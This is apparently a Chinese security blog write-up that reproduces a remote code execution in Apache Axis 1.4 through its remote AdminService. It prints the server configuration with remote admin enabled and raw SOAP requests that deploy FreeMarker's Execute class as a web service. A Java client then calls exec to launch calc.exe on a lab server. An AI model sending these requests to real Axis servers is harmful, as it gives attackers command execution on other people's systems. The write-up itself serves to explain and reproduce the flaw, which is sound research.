<servlet> <servlet-name>AxisServlet</servlet-name> <servlet-class>org.apache.axis.transport.http.AxisServlet</servlet-class> </servlet> <!-- 这里是访问服务的路径 --> <servlet-mapping> <servlet-name>AxisServlet</servlet-name> <url-pattern>/services/*</url-pattern> </servlet-mapping>
package com.zhutougg.axis; public interface SayHello { public String say(String name); } package com.zhutougg.axis; public class SayHelloImpl implements SayHello{ public String say(String name) { return "Hello my friend " + name; } }
<?xml version="1.0" encoding="UTF-8"?> <deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"> <handler name="URLMapper" type="java:org.apache.axis.handlers.http.URLMapper"/> <handler name="LocalResponder" type="java:org.apache.axis.transport.local.LocalResponder"/> <handler name="Authenticate" type="java:org.apache.axis.handlers.SimpleAuthenticationHandler"/> <service name="AdminService" provider="java:MSG"> <parameter name="allowedMethods" value="AdminService"/> <parameter name="enableRemoteAdmin" value="true"/> <parameter name="className" value="org.apache.axis.utils.Admin"/> <namespace>http://xml.apache.org/axis/wsdd/</namespace> </service> <service name="Version" provider="java:RPC"> <parameter name="allowedMethods" value="getVersion"/> <parameter name="className" value="org.apache.axis.Version"/> </service> <transport name="http"> <requestFlow> <handler type="URLMapper"/> <handler type="java:org.apache.axis.handlers.http.HTTPAuthHandler"/> </requestFlow> <parameter name="qs:list" value="org.apache.axis.transport.http.QSListHandler"/> <parameter name="qs:wsdl" value="org.apache.axis.transport.http.QSWSDLHandler"/> <parameter name="qs.list" value="org.apache.axis.transport.http.QSListHandler"/> <parameter name="qs.method" value="org.apache.axis.transport.http.QSMethodHandler"/> <parameter name="qs:method" value="org.apache.axis.transport.http.QSMethodHandler"/> <parameter name="qs.wsdl" value="org.apache.axis.transport.http.QSWSDLHandler"/> </transport> <transport name="local"> <responseFlow> <handler type="LocalResponder"/> </responseFlow> </transport> <!-- 配置自己的服务 --> <service name="sayHello" provider="java:RPC"> <parameter name="className" value="com.zhutougg.axis.SayHelloImpl" /> <parameter name="allowedMethods" value="*" /> </service> </deployment>
public static void main(String[] args) throws Exception { String wsdlAddress = "http:// 10.31.12.231:8888/AxisProject/services/sayHello?wsdl"; Service service = new Service(); Call call = (Call) service.createCall(); call.setTargetEndpointAddress(wsdlAddress); String val = (String) call.invoke("say", new Object[] {"aaaaaaa"}); System.out.println("这是webservice服务器返回的信息:/n" + val); }
POST /AxisProject/services/sayHello?wsdl HTTP/1.0 Content-Type: text/xml; charset=utf-8 Accept: application/soap+xml, application/dime, multipart/related, text/* User-Agent: Axis/1.4 Host: 10.31.12.231:8888 Cache-Control: no-cache Pragma: no-cache SOAPAction: "" Content-Length: 442 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><say soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><arg0 xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">aaaaaaa</arg0></say></soapenv:Body></soapenv:Envelope>
http://axis.apache.org/axis/java/user-guide.html
POST /AxisProject/services/AdminService?wsdl HTTP/1.0 Content-Type: text/xml; charset=utf-8 Accept: application/soap+xml, application/dime, multipart/related, text/* User-Agent: Axis/1.4 Host: 10.31.12.231:8888 Cache-Control: no-cache Pragma: no-cache SOAPAction: "" Content-Length: 588 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"> <service name="MyService" provider="java:RPC"> <parameter name="className" value="samples.userguide.example3.MyService"/> <parameter name="allowedMethods" value="*"/> </service> </deployment></soapenv:Body></soapenv:Envelope>
http://10.31.12.231:8888/AxisProject/services
链接,发现提示我们刚刚添加的类名找不着 而之前的漏洞通报 https://www.gdcert.com.cn/index/news_detail/W1BZRDEYCh0cDRkcGw
中提示到使用Freemarker插件的前题下才会存在漏洞,故推测使用freemarker.template.utility.Execute. exec (List arguments)方法执行命令,参考链接 https://blog.csdn.net/weixin_33967071/article/details/89831707
而Axis自带的jar包中并不包括这个文件,所以这里需要手动将该JAR包加到项目中
POST /AxisProject/services/AdminService?wsdl HTTP/1.0 Content-Type: text/xml; charset=utf-8 Accept: application/soap+xml, application/dime, multipart/related, text/* User-Agent: Axis/1.4 Host: 10.31.12.231:8888 Cache-Control: no-cache Pragma: no-cache SOAPAction: "" Content-Length: 594 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soapenv:Body> <deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"> <service name="freemarker" provider="java:RPC"> <parameter name="className" value="freemarker.template.utility.Execute"/> <parameter name="allowedMethods" value="*"/> </service> </deployment> </soapenv:Body></soapenv:Envelope>
public static void main(String[] args) throws Exception { String wsdlAddress = "http://10.31.12.231:8888/AxisProject/services/freemarker?wsdl"; Service service = new Service(); Call call = (Call) service.createCall(); call.setTargetEndpointAddress(wsdlAddress); List<String> list = new ArrayList<String>(); list.add("calc.exe"); String val = (String) call.invoke("exec", new Object[] {list}); System.out.println("这是webservice服务器返回的信息:/n" + val); }
POST /AxisProject/services/freemarker?wsdl HTTP/1.0 Content-Type: text/xml; charset=utf-8 Accept: application/soap+xml, application/dime, multipart/related, text/* User-Agent: Axis/1.4 Host: 10.31.12.231:8888 Cache-Control: no-cache Pragma: no-cache SOAPAction: "" Content-Length: 645 <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><arg0 href="#id0"/></exec><multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><multiRef xsi:type="soapenc:string">calc.exe</multiRef></multiRef></soapenv:Body></soapenv:Envelope>
之前就有看到这个漏洞,感觉比较鸡肋就懒得写文章,但是看到 https://xz.aliyun.com/t/5513 这篇文章之后,觉得既然要写,就要写清楚,每一步是怎么来的。
最后我并不觉得这个是漏洞,而是Axis提供正常的功能而已。
最后的最后,这里有个二维码,希望大家扫一下